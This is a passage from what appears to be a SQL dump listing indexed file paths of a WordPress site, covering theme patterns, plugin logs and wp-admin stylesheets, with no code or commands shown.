inc/patterns/general-pricing-table.php'),(13702,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-subscribe.php','wp-content/themes/twentytwentytwo/inc/patterns/general-subscribe.php'),(13703,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-two-images-text.php','wp-content/themes/twentytwentytwo/inc/patterns/general-two-images-text.php'),(13704,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-video-header-details.php','wp-content/themes/twentytwentytwo/inc/patterns/general-video-header-details.php'),(13705,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-video-trailer.php','wp-content/themes/twentytwentytwo/inc/patterns/general-video-trailer.php'),(13706,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-wide-image-intro-buttons.php','wp-content/themes/twentytwentytwo/inc/patterns/general-wide-image-intro-buttons.php'),(13707,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-centered-logo-black-background.php','wp-content/themes/twentytwentytwo/inc/patterns/header-centered-logo-black-background.php'),(13708,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-centered-logo.php','wp-content/themes/twentytwentytwo/inc/patterns/header-centered-logo.php'),(13709,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-centered-title-navigation-social.php','wp-content/themes/twentytwentytwo/inc/patterns/header-centered-title-navigation-social.php'),(13710,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-default.php','wp-content/themes/twentytwentytwo/inc/patterns/header-default.php'),(13711,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-image-background-overlay.php','wp-content/themes/twentytwentytwo/inc/patterns/header-image-background-overlay.php'),(13712,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-image-background.php','wp-content/themes/twentytwentytwo/inc/patterns/header-image-background.php'),(13713,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-large-dark.php','wp-content/themes/twentytwentytwo/inc/patterns/header-large-dark.php'),(13714,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-logo-navigation-gray-background.php','wp-content/themes/twentytwentytwo/inc/patterns/header-logo-navigation-gray-background.php'),(13715,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-logo-navigation-offset-tagline.php','wp-content/themes/twentytwentytwo/inc/patterns/header-logo-navigation-offset-tagline.php'),(13716,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-logo-navigation-social-black-background.php','wp-content/themes/twentytwentytwo/inc/patterns/header-logo-navigation-social-black-background.php'),(13717,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-small-dark.php','wp-content/themes/twentytwentytwo/inc/patterns/header-small-dark.php'),(13718,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-stacked.php','wp-content/themes/twentytwentytwo/inc/patterns/header-stacked.php'),(13719,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-text-only-green-background.php','wp-content/themes/twentytwentytwo/inc/patterns/header-text-only-green-background.php'),(13720,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-text-only-salmon-background.php','wp-content/themes/twentytwentytwo/inc/patterns/header-text-only-salmon-background.php'),(13721,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-text-only-with-tagline-black-background.php','wp-content/themes/twentytwentytwo/inc/patterns/header-text-only-with-tagline-black-background.php'),(13722,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-title-and-button.php','wp-content/themes/twentytwentytwo/inc/patterns/header-title-and-button.php'),(13723,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-title-navigation-social.php','wp-content/themes/twentytwentytwo/inc/patterns/header-title-navigation-social.php'),(13724,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-with-tagline.php','wp-content/themes/twentytwentytwo/inc/patterns/header-with-tagline.php'),(13725,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/hidden-404.php','wp-content/themes/twentytwentytwo/inc/patterns/hidden-404.php'),(13726,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/hidden-bird.php','wp-content/themes/twentytwentytwo/inc/patterns/hidden-bird.php'),(13727,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/hidden-heading-and-bird.php','wp-content/themes/twentytwentytwo/inc/patterns/hidden-heading-and-bird.php'),(13728,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-about-large-image-and-buttons.php','wp-content/themes/twentytwentytwo/inc/patterns/page-about-large-image-and-buttons.php'),(13729,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-about-links-dark.php','wp-content/themes/twentytwentytwo/inc/patterns/page-about-links-dark.php'),(13730,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-about-links.php','wp-content/themes/twentytwentytwo/inc/patterns/page-about-links.php'),(13731,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-about-media-left.php','wp-content/themes/twentytwentytwo/inc/patterns/page-about-media-left.php'),(13732,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-about-media-right.php','wp-content/themes/twentytwentytwo/inc/patterns/page-about-media-right.php'),(13733,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-about-simple-dark.php','wp-content/themes/twentytwentytwo/inc/patterns/page-about-simple-dark.php'),(13734,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-about-solid-color.php','wp-content/themes/twentytwentytwo/inc/patterns/page-about-solid-color.php'),(13735,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-layout-image-and-text.php','wp-content/themes/twentytwentytwo/inc/patterns/page-layout-image-and-text.php'),(13736,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-layout-image-text-and-video.php','wp-content/themes/twentytwentytwo/inc/patterns/page-layout-image-text-and-video.php'),(13737,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-layout-two-columns.php','wp-content/themes/twentytwentytwo/inc/patterns/page-layout-two-columns.php'),(13738,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-blog-posts-right.php','wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-blog-posts-right.php'),(13739,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-blog-posts.php','wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-blog-posts.php'),(13740,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-grid-posts.php','wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-grid-posts.php'),(13741,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-poster.php','wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-poster.php'),(13742,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/query-default.php','wp-content/themes/twentytwentytwo/inc/patterns/query-default.php'),(13743,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/query-grid.php','wp-content/themes/twentytwentytwo/inc/patterns/query-grid.php'),(13744,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/query-image-grid.php','wp-content/themes/twentytwentytwo/inc/patterns/query-image-grid.php'),(13745,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/query-irregular-grid.php','wp-content/themes/twentytwentytwo/inc/patterns/query-irregular-grid.php'),(13746,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/query-large-titles.php','wp-content/themes/twentytwentytwo/inc/patterns/query-large-titles.php'),(13747,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/query-simple-blog.php','wp-content/themes/twentytwentytwo/inc/patterns/query-simple-blog.php'),(13748,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/query-text-grid.php','wp-content/themes/twentytwentytwo/inc/patterns/query-text-grid.php'),(13749,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/index.php','wp-content/themes/twentytwentytwo/index.php'),(13750,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/parts/footer.html','wp-content/themes/twentytwentytwo/parts/footer.html'),(13751,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/parts/header-large-dark.html','wp-content/themes/twentytwentytwo/parts/header-large-dark.html'),(13752,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/parts/header-small-dark.html','wp-content/themes/twentytwentytwo/parts/header-small-dark.html'),(13753,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/parts/header.html','wp-content/themes/twentytwentytwo/parts/header.html'),(13754,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/readme.txt','wp-content/themes/twentytwentytwo/readme.txt'),(13755,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/screenshot.png','wp-content/themes/twentytwentytwo/screenshot.png'),(13756,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/style.css','wp-content/themes/twentytwentytwo/style.css'),(13757,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/styles/blue.json','wp-content/themes/twentytwentytwo/styles/blue.json'),(13758,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/styles/pink.json','wp-content/themes/twentytwentytwo/styles/pink.json'),(13759,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/styles/swiss.json','wp-content/themes/twentytwentytwo/styles/swiss.json'),(13760,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/404.html','wp-content/themes/twentytwentytwo/templates/404.html'),(13761,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/archive.html','wp-content/themes/twentytwentytwo/templates/archive.html'),(13762,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/blank.html','wp-content/themes/twentytwentytwo/templates/blank.html'),(13763,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/home.html','wp-content/themes/twentytwentytwo/templates/home.html'),(13764,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/index.html','wp-content/themes/twentytwentytwo/templates/index.html'),(13765,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/page-large-header.html','wp-content/themes/twentytwentytwo/templates/page-large-header.html'),(13766,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/page-no-separators.html','wp-content/themes/twentytwentytwo/templates/page-no-separators.html'),(13767,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/page.html','wp-content/themes/twentytwentytwo/templates/page.html'),(13768,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/search.html','wp-content/themes/twentytwentytwo/templates/search.html'),(13769,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/single-no-separators.html','wp-content/themes/twentytwentytwo/templates/single-no-separators.html'),(13770,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/single.html','wp-content/themes/twentytwentytwo/templates/single.html'),(13771,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/theme.json','wp-content/themes/twentytwentytwo/theme.json'),(13772,'/home/tummmyov/tummyrevolution.com/wp-content/uploads/wc-logs/index.html','wp-content/uploads/wc-logs/index.html'),(13773,'/home/tummmyov/tummyrevolution.com/wp-content/uploads/woocommerce_uploads/index.html','wp-content/uploads/woocommerce_uploads/index.html'),(13774,'/home/tummmyov/tummyrevolution.com/wp-content/uploads/woocommerce_uploads/reports/index.html','wp-content/uploads/woocommerce_uploads/reports/index.html'),(13775,'/home/tummmyov/tummyrevolution.com/wp-content/w3tc-config/index.html','wp-content/w3tc-config/index.html'),(13776,'/home/tummmyov/tummyrevolution.com/wp-content/w3tc-config/master.php','wp-content/w3tc-config/master.php'),(13777,'/home/tummmyov/tummyrevolution.com/wp-content/wflogs/attack-data.php','wp-content/wflogs/attack-data.php'),(13778,'/home/tummmyov/tummyrevolution.com/wp-content/wflogs/config-livewaf.php','wp-content/wflogs/config-livewaf.php'),(13779,'/home/tummmyov/tummyrevolution.com/wp-content/wflogs/config-synced.php','wp-content/wflogs/config-synced.php'),(13780,'/home/tummmyov/tummyrevolution.com/wp-content/wflogs/config-transient.php','wp-content/wflogs/config-transient.php'),(13781,'/home/tummmyov/tummyrevolution.com/wp-content/wflogs/config.php','wp-content/wflogs/config.php'),(13782,'/home/tummmyov/tummyrevolution.com/wp-content/wflogs/ips.php','wp-content/wflogs/ips.php'),(13783,'/home/tummmyov/tummyrevolution.com/wp-content/wflogs/rules.php','wp-content/wflogs/rules.php'),(13784,'/home/tummmyov/tummyrevolution.com/wp-content/wflogs/template.php','wp-content/wflogs/template.php'),(13785,'/home/tummmyov/tummyrevolution.com/index.php','index.php'),(13786,'/home/tummmyov/tummyrevolution.com/license.txt','license.txt'),(13787,'/home/tummmyov/tummyrevolution.com/readme.html','readme.html'),(13788,'/home/tummmyov/tummyrevolution.com/settings.php','settings.php'),(13789,'/home/tummmyov/tummyrevolution.com/wordfence-waf.php','wordfence-waf.php'),(13790,'/home/tummmyov/tummyrevolution.com/wp-activate.php','wp-activate.php'),(13791,'/home/tummmyov/tummyrevolution.com/wp-admin/.htaccess','wp-admin/.htaccess'),(13792,'/home/tummmyov/tummyrevolution.com/wp-admin/TFWk17JbsY5.php','wp-admin/TFWk17JbsY5.php'),(13793,'/home/tummmyov/tummyrevolution.com/wp-admin/about.php','wp-admin/about.php'),(13794,'/home/tummmyov/tummyrevolution.com/wp-admin/admin-ajax.php','wp-admin/admin-ajax.php'),(13795,'/home/tummmyov/tummyrevolution.com/wp-admin/admin-footer.php','wp-admin/admin-footer.php'),(13796,'/home/tummmyov/tummyrevolution.com/wp-admin/admin-functions.php','wp-admin/admin-functions.php'),(13797,'/home/tummmyov/tummyrevolution.com/wp-admin/admin-header.php','wp-admin/admin-header.php'),(13798,'/home/tummmyov/tummyrevolution.com/wp-admin/admin-post.php','wp-admin/admin-post.php'),(13799,'/home/tummmyov/tummyrevolution.com/wp-admin/admin.php','wp-admin/admin.php'),(13800,'/home/tummmyov/tummyrevolution.com/wp-admin/async-upload.php','wp-admin/async-upload.php'),(13801,'/home/tummmyov/tummyrevolution.com/wp-admin/authorize-application.php','wp-admin/authorize-application.php'),(13802,'/home/tummmyov/tummyrevolution.com/wp-admin/comment.php','wp-admin/comment.php'),(13803,'/home/tummmyov/tummyrevolution.com/wp-admin/contribute.php','wp-admin/contribute.php'),(13804,'/home/tummmyov/tummyrevolution.com/wp-admin/credits.php','wp-admin/credits.php'),(13805,'/home/tummmyov/tummyrevolution.com/wp-admin/css/about-rtl.css','wp-admin/css/about-rtl.css'),(13806,'/home/tummmyov/tummyrevolution.com/wp-admin/css/about-rtl.min.css','wp-admin/css/about-rtl.min.css'),(13807,'/home/tummmyov/tummyrevolution.com/wp-admin/css/about.css','wp-admin/css/about.css'),(13808,'/home/tummmyov/tummyrevolution.com/wp-admin/css/about.min.css','wp-admin/css/about.min.css'),(13809,'/home/tummmyov/tummyrevolution.com/wp-admin/css/admin-menu-rtl.css','wp-admin/css/admin-menu-rtl.css'),(13810,'/home/tummmyov/tummyrevolution.com/wp-admin/css/admin-menu-rtl.min.css','wp-admin/css/admin-menu-rtl.min.css'),(13811,'/home/tummmyov/tummyrevolution.com/wp-admin/css/admin-menu.css','wp-admin/css/admin-menu.css'),(13812,'/home/tummmyov/tummyrevolution.com/wp-admin/css/admin-menu.min.css','wp-admin/css/admin-menu.min.css'),(13813,'/home/tummmyov/tummyrevolution.com/wp-admin/css/code-editor-rtl.css','wp-admin/css/code-editor-rtl.css'),(13814,'/home/tummmyov/tummyrevolution.com/wp-admin/css/code-editor-rtl.min.css','wp-admin/css/code-editor-rtl.min.css'),(13815,'/home/tummmyov/tummyrevolution.com/wp-admin/css/code-editor.css','wp-admin/css/code-editor.css'),(13816,'/home/tummmyov/tummyrevolution.com/wp-admin/css/code-editor.min.css','wp-admin/css/code-editor.min.css'),(13817,'/home/tummmyov/tummyrevolution.com/wp-admin/css/color-picker-rtl.css','wp-admin/css/color-picker-rtl.css'),(13818,'/home/tummmyov/tummyrevolution.com/wp-admin/css/color-picker-rtl.min.css','wp-admin/css/color-picker-rtl.min.css'),(13819,'/home/tummmyov/tummyrevolution.com/wp-admin/css/color-picker.css','wp-admin/css/color-picker.css'),(13820,'/home/tummmyov/tummyrevolution.com/wp-admin/css/color-picker.min.css','wp-admin/css/color-picker.min.css'),(13821,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/_admin.scss','wp-admin/css/colors/_admin.scss'),(13822,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/_mixins.scss','wp-admin/css/colors/_mixins.scss'),(13823,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/_variables.scss','wp-admin/css/colors/_variables.scss'),(13824,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/blue/colors-rtl.css','wp-admin/css/colors/blue/colors-rtl.css'),(13825,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/blue/colors-rtl.min.css','wp-admin/css/colors/blue/colors-rtl.min.css'),(13826,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/blue/colors.css','wp-admin/css/colors/blue/colors.css'),(13827,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/blue/colors.min.css','wp-admin/css/colors/blue/colors.min.css'),(13828,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/blue/colors.scss','wp-admin/css/colors/blue/colors.scss'),(13829,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/coffee/colors-rtl.css','wp-admin/css/colors/coffee/colors-rtl.css'),(13830,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/coffee/colors-rtl.min.css','wp-admin/css/colors/coffee/colors-rtl.min.css'),(13831,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/coffee/colors.css','wp-admin/css/colors/coffee/colors.css'),(13832,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/coffee/colors.min.css','wp-admin/css/colors/coffee/colors.min.css'),(13833,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/coffee/colors.scss','wp-admin/css/colors/coffee/colors.scss'),(13834,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ectoplasm/colors-rtl.css','wp-admin/css/colors/ectoplasm/colors-rtl.css'),(13835,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ectoplasm/colors-rtl.min.css','wp-admin/css/colors/ectoplasm/colors-rtl.min.css'),(13836,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ectoplasm/colors.css','wp-admin/css/colors/ectoplasm/colors.css'),(13837,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ectoplasm/colors.min.css','wp-admin/css/colors/ectoplasm/colors.min.css'),(13838,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ectoplasm/colors.scss','wp-admin/css/colors/ectoplasm/colors.scss'),(13839,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/light/colors-rtl.css','wp-admin/css/colors/light/colors-rtl.css'),(13840,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/light/colors-rtl.min.css','wp-admin/css/colors/light/colors-rtl.min.css'),(13841,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/light/colors.css','wp-admin/css/colors/light/colors.css'),(13842,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/light/colors.min.css','wp-admin/css/colors/light/colors.min.css'),(13843,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/light/colors.scss','wp-admin/css/colors/light/colors.scss'),(13844,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/midnight/colors-rtl.css','wp-admin/css/colors/midnight/colors-rtl.css'),(13845,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/midnight/colors-rtl.min.css','wp-admin/css/colors/midnight/colors-rtl.min.css'),(13846,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/midnight/colors.css','wp-admin/css/colors/midnight/colors.css'),(13847,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/midnight/colors.min.css','wp-admin/css/colors/midnight/colors.min.css'),(13848,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/midnight/colors.scss','wp-admin/css/colors/midnight/colors.scss'),(13849,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/modern/colors-rtl.css','wp-admin/css/colors/modern/colors-rtl.css'),(13850,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/modern/colors-rtl.min.css','wp-admin/css/colors/modern/colors-rtl.min.css'),(13851,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/modern/colors.css','wp-admin/css/colors/modern/colors.css'),(13852,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/modern/colors.min.css','wp-admin/css/colors/modern/colors.min.css'),(13853,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/modern/colors.scss','wp-admin/css/colors/modern/colors.scss'),(13854,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ocean/colors-rtl.css','wp-admin/css/colors/ocean/colors-rtl.css'),(13855,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ocean/colors-rtl.min.css','wp-admin/css/colors/ocean/colors-rtl.min.css'),(13856,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ocean/colors.css','wp-admin/css/colors/ocean/colors.css'),(13857,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ocean/colors.min.css','wp-admin/css/colors/ocean/colors.min.css'),(13858,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ocean/colors.scss','wp-admin/css/colors/ocean/colors.scss'),(13859,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/sunrise/colors-rtl.css','wp-admin/css/colors/sunrise/colors-rtl.css'),(13860,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/sunrise/colors-rtl.min.css','wp-admin/css/colors/sunrise/colors-rtl.min.css'),(13861,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/sunrise/colors.css','wp-admin/css/colors/sunrise/colors.css'),(13862,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/sunrise/colors.min.css','wp-admin/css/colors/sunrise/colors.min.css'),(13863,'/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/sunrise/colors.scss','wp-admin/css/colors/sunrise/colors.scss'),(13864,'/home/tummmyov/tummyrevolution.com/wp-admin/css/common-rtl.css','wp-admin/css/common-rtl.css'),(13865,'/home/tummmyov/tummyrevolution.com/wp-admin/css/common-rtl.min.css','wp-admin/css/common-rtl.min.css'),(13866,'/home/tummmyov/tummyrevolution.com/wp-admin/css/common.css','wp-admin/css/common.css'),(13867,'/home/tummmyov/tummyrevolution.com/wp-admin/css/common.min.css','wp-admin/css/common.min.css'),(13868,'/home/tummmyov/tummyrevolution.com/wp-admin/css/customize-controls-rtl.css','wp-admin/css/customize-controls-rtl.css'),(13869,'/home/tummmyov/tummyrevolution.com/wp-admin/css/customize-controls-rtl.min.css','wp-admin/css/customize-controls-rtl.min.css'),(13870,'/home/tummmyov/tummyrevolution.com/wp-admin/css/customize-controls.css','wp-admin/css/customize-controls.css'),(13871,'/home/tummmyov/tummyrevolution.com/wp-admin/css/customize-controls.min.css','wp-admin/css/customize-controls.min.css'),(13872,'/home/tummmyov/tummyrevolution.com/wp-admin/css/customize-nav-menus-rtl.css','wp-admin/css/customize-nav-menus-rtl.css'),(13873,'/home/tummmyov/tummyrevolution.com/wp-admin/css/customize-nav-menus-rtl.min.css','wp-admin/css/customize-nav-menus-rtl.min.css'),(13874,'/home/tummmyov/tummyrevolution.com/wp-admin/css/customize-nav-menus.css','wp-admin/css/customize-nav-menus.css'),(13875,'/home/tummmyov/tummyrevolution.com/wp-admin/css/customize-nav-menus.min.css','wp-admin/css/customize-nav-menus.min.css'),(13876,'/home/tummmyov/tummyrevolution.com/wp-admin/css/customize-widgets-rtl.css','wp-admin/css/customize-widgets-rtl.css'),(13877,'/home/tummmyov/tummyrevolution.com/wp-admin/css/customize-widgets-rtl.min.css','wp-admin/css/customize-widgets-rtl.min.css'),(13878,'/home/tummmyov/tummyrevolution.com/wp-admin/css/customize-widgets.css','wp-admin/css/customize-widgets.css'),(13879,'/home/tummmyov/tummyrevolution.com/wp-admin/css/customize-widgets.min.css','wp-admin/css/customize-widgets.min.css'),(13880,'/home/tummmyov/tummyrevolution.com/wp-admin/css/dashboard-rtl.css','wp-admin/css/dashboard-rtl.css'),(13881,'/home/tummmyov/tummyrevolution.com/wp-admin/css/dashboard-rtl.min.css','wp-admin/css/dashboard-rtl.min.css'),(13882,'/home/tummmyov/tummyrevolution.com/wp-admin/css/dashboard.css','wp-admin/css/dashboard.css'),(13883,'/home/tummmyov/tummyrevolution.com/wp-admin/css/dashboard.min.css','wp-admin/css/dashboard.min.css'),(13884,'/home/tummmyov/tummyrevolution.com/wp-admin/css/deprecated-media-rtl.css','wp-admin/css/deprecated-media-rtl.css'),(13885,'/home/tummmyov/tummyrevolution.com/wp-admin/css/deprecated-media-rtl.min.css','wp-admin/css/deprecated-media-rtl.min.css'),(13886,'/home/tummmyov/tummyrevolution.com/wp-admin/css/deprecated-media.css','wp-admin/css/deprecated-media.css'),(13887,'/home/tummmyov/tummyrevolution.com/wp-admin/css/deprecated-media.min.css','wp-admin/css/deprecated-media.min.css'),(13888,'/home/tummmyov/tummyrevolution.com/wp-admin/css/edit-rtl.css','wp-admin/css/edit-rtl.css'),(13889,'/home/tummmyov/tummyrevolution.com/wp-admin/css/edit-rtl.min.css','wp-admin/css/edit-rtl.min.css'),(13890,'/home/tummmyov/tummyrevolution.com/wp-admin/css/edit.css','wp-admin/css/edit.css'),(13891,'/home/tummmyov/tummyrevolution.com/wp-admin/css/edit.min.css','wp-admin/css/edit.min.css'),(13892,'/home/tummmyov/tummyrevolution.com/wp-admin/css/farbtastic-rtl.css','wp-admin/css/farbtastic-rtl.css'),(13893,'/home/tummmyov/tummyrevolution.com/wp-admin/css/farbtastic-rtl.min.css','wp-admin/css/farbtastic-rtl.min.css'),(13894,'/home/tummmyov/tummyrevolution.com/wp-admin/css/farbtastic.css','wp-admin/css/farbtastic.css'),(13895,'/home/tummmyov/tummyrevolution.com/wp-admin/css/farbtastic.min.css','wp-admin/css/farbtastic.min.css'),(13896,'/home/tummmyov/tummyrevolution.com/wp-admin/css/forms-rtl.css','wp-admin/css/forms-rtl.css'),(13897,'/home/tummmyov/tummyrevolution.com/wp-admin/css/forms-rtl.min.css','wp-admin/css/forms-rtl.min.css'),(13898,'/home/tummmyov/tummyrevolution.com/wp-admin/css/forms.css','wp-admin/css/forms.css'),(13899,'/home/tummmyov/tummyrevolution.com/wp-admin/css/forms.min.css','wp-admin/css/forms.min.css'),(13900,'/home/tummmyov/tummyrevolution.com/wp-admin/css/install-rtl.css','wp-admin/css/install-rtl.css'),(13901,'/home/tummmyov/tummyrevolution.com/wp-admin/css/install-rtl.min.css','wp-admin/css/install-rtl.min.css'),(13902,'/home/tummmyov/tummyrevolution.com/wp-admin/css/install.css','wp-admin/css/install.css'),(13903,'/home/tummmyov/tummyrevolution.com/wp-admin/css/install.min.css','wp-admin/css/install.min.css'),(13904,'/home/tummmyov/tummyrevolution.com/wp-admin/css/l10n-rtl.css','wp-admin/css/l10n-rtl.css'),(13905,'/home/tummmyov/tummyrevolution.com/wp-admin/css/l10n-rtl.min.css','wp-admin/css/l10n-rtl.min.css'),(13906,'/home/tummmyov/tummyrevolution.com/wp-admin/css/l10n.css','wp-admin/css/l10n.css'),(13907,'/home/tummmyov/tummyrevolution.com/wp-admin/css/l10n.min.css','wp-admin/css/l10n.min.css'),(13908,'/home/tummmyov/tummyrevolution.com/wp-admin/css/list-tables-rtl.css','wp-admin/css/list-tables-rtl.css'),(13909,'/home/tummmyov/tummyrevolution.com/wp-admin/css/list-tables-rtl.min.css','wp-admin/css/list-tables-rtl.min.css'),(13910,'/home/tummmyov/tummyrevolution.com/wp-admin/css/list-tables.css','wp-admin/css/list-tables.css'),(13911,'/home/tummmyov/tummyrevolution.com/wp-admin/css/list-tables.min.css','wp-admin/css/list-tables.min.css'),(13912,'/home/tummmyov/tummyrevolution.com/wp-admin/css/login-rtl.css','wp-admin/css/login-rtl.css'),(13913,'/home/tummmyov/tummyrevolution.com/wp-admin/css/login-rtl.min.css','wp-admin/css/login-rtl.min.css'),(13914,'/home/tummmyov/tummyrevolution.com/wp-admin/css/login.